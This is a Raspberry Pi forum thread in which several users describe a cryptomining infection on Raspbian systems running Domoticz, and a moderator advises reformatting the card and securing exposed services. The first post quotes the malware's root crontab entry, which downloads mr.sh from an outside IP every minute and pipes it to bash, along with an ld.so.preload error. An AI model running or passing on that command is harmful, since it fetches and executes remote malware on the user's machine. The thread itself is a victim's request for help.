Martial
Posts: 3
Joined: Thu Jun 13, 2019 7:11 am

Virus or not ?

Thu Jun 13, 2019 7:23 am

Hi,
I use 2 rpi (one rpi3B and 1 rpi2b) with raspbian and domoticz.
On the rpi3, i had this problem:
- messages
ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/usr/local/lib/libkk.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
- in root crontab
* * * * * (curl -s http://107.173.102.59/mr.sh||wget -q -O - http://107.173.102.59/mr.sh)|bash -sh

I have done a restore, changed pi and root password, closed NAT rules from my box (public 8080 --> 80: domoticz, 1194: openvpn).
And the problem seems to be fixed.

Do you known this attack ?
What can i do before reopenning the ports ?
Thank you for you help
Martial

jamesh
Raspberry Pi Engineer & Forum Moderator
Raspberry Pi Engineer & Forum Moderator
Posts: 22064
Joined: Sat Jul 30, 2011 7:41 pm

Re: Virus or not ?

Thu Jun 13, 2019 8:43 am

Principal Software Engineer at Raspberry Pi (Trading) Ltd.
Contrary to popular belief, humorous signatures are allowed. Here's an example...
"My grief counseller just died, luckily, he was so good, I didn't care."

rutgercjonaker
Posts: 1
Joined: Thu Jun 13, 2019 10:48 am

Re: Virus or not ?

Thu Jun 13, 2019 10:54 am

I have also got it. :shock:
Is it "mr.sh"?
I have tried remove some temp files but no luck.
Anoy one knows how to remove it without go back to an old backup?

jamesh
Raspberry Pi Engineer & Forum Moderator
Raspberry Pi Engineer & Forum Moderator
Posts: 22064
Joined: Sat Jul 30, 2011 7:41 pm

Re: Virus or not ?

Thu Jun 13, 2019 11:22 am

https://discourse.nodered.org/t/cryptom ... rvers/3454

Reformat the SD card and ensure you follow sensible security policies when opening device to the internet.
Principal Software Engineer at Raspberry Pi (Trading) Ltd.
Contrary to popular belief, humorous signatures are allowed. Here's an example...
"My grief counseller just died, luckily, he was so good, I didn't care."

Martial
Posts: 3
Joined: Thu Jun 13, 2019 7:11 am

Re: Virus or not ?

Fri Jun 14, 2019 8:53 am

thank you Jamesh,
Do you know the most likely door they used to enter ?
the web server of domoticz ?
openvpn ?
I had already changed the passwords of root and pi. Can I find a trace in a log system of their entry into my system ?

Regards

jamesh
Raspberry Pi Engineer & Forum Moderator
Raspberry Pi Engineer & Forum Moderator
Posts: 22064
Joined: Sat Jul 30, 2011 7:41 pm

Re: Virus or not ?

Fri Jun 14, 2019 9:12 am

Martial wrote:
Fri Jun 14, 2019 8:53 am
thank you Jamesh,
Do you know the most likely door they used to enter ?
the web server of domoticz ?
openvpn ?
I had already changed the passwords of root and pi. Can I find a trace in a log system of their entry into my system ?

Regards
I have no idea. Sorry.
Principal Software Engineer at Raspberry Pi (Trading) Ltd.
Contrary to popular belief, humorous signatures are allowed. Here's an example...
"My grief counseller just died, luckily, he was so good, I didn't care."

SouD
Posts: 1
Joined: Mon Jun 17, 2019 7:23 pm

Re: Virus or not ?

Mon Jun 17, 2019 7:34 pm

Hi guys,
I got the same crypto malware / virus.

I deleted all Cron entries, temporaries folders, blocked all ports / ip but it still persists.
It stopped for few days but came back (I'm tracking with wireshark)

I'm going to reinstall all the system one more time...
Martial, can you tell me if your system has been hacked again right after the reinstall ?
Can I go mind free reconfiguring the PI for the XXXXXXXth time ? Or should I pray for my IP to not be listed on a wrong list ?

BTW I'm using the raspberry for octoprint / openvpn / domoticz only. I have an internet acces to domoticz for personal project :/
I suspect domoticz...

SouD

Martial
Posts: 3
Joined: Thu Jun 13, 2019 7:11 am

Re: Virus or not ?

Tue Jun 18, 2019 7:44 am

SouD wrote:
Mon Jun 17, 2019 7:34 pm

Martial, can you tell me if your system has been hacked again right after the reinstall ?
Can I go mind free reconfiguring the PI for the XXXXXXXth time ? Or should I pray for my IP to not be listed on a wrong list ?
SouD
Hi,
I have not reinstall the system, I used a clone of my SD card which, luckily, was only a few hours old and without the virus.

I have not reopen the NAT rules, I am looking to secure all that before.
Martial

Return to “Troubleshooting”